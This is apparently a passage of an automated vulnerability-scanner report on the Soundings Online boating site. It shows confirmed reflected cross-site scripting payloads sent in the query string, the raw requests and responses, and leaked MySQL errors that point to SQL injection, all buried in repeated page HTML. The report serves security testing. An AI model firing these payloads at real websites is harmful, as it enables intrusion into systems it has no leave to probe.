<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</..
- /boat-shop/sea-savvy/

/boat-shop/sea-savvy/ CONFIRMED

http://www.soundingsonline.com/boat-shop/sea-savvy/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00246E)</script>

Request

GET /boat-shop/sea-savvy/?'"--></style></script><script>netsparker(0x00246E)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/boat-shop/sea-savvy/272552-you-can-look-the-part-or-look-like-me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00246E)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00246E)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/sea-savvy/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Cruising Life through the Eyes of Tom Neale</title> <link href="/boat-shop/sea-savvy?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/sea-savvy?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_sea_savvy m_sea_savvy"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 52, c_sea_savvy<br />Menu: 79, m_sea_savvy-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscr..
- /news/todays-top-stories/275982-report-documents-injury-during-rescue

/news/todays-top-stories/275982-report-documents-injury-during-rescue CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/275982-report-documents-injury-during-rescue?..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002487)</script>

Request

GET /news/todays-top-stories/275982-report-documents-injury-during-rescue?'"--></style></script><script>netsparker(0x002487)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002487)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002487)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/275982-report-documents-injury-during-rescue" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Report documents injury during rescue" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Report documents injury during rescue</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a 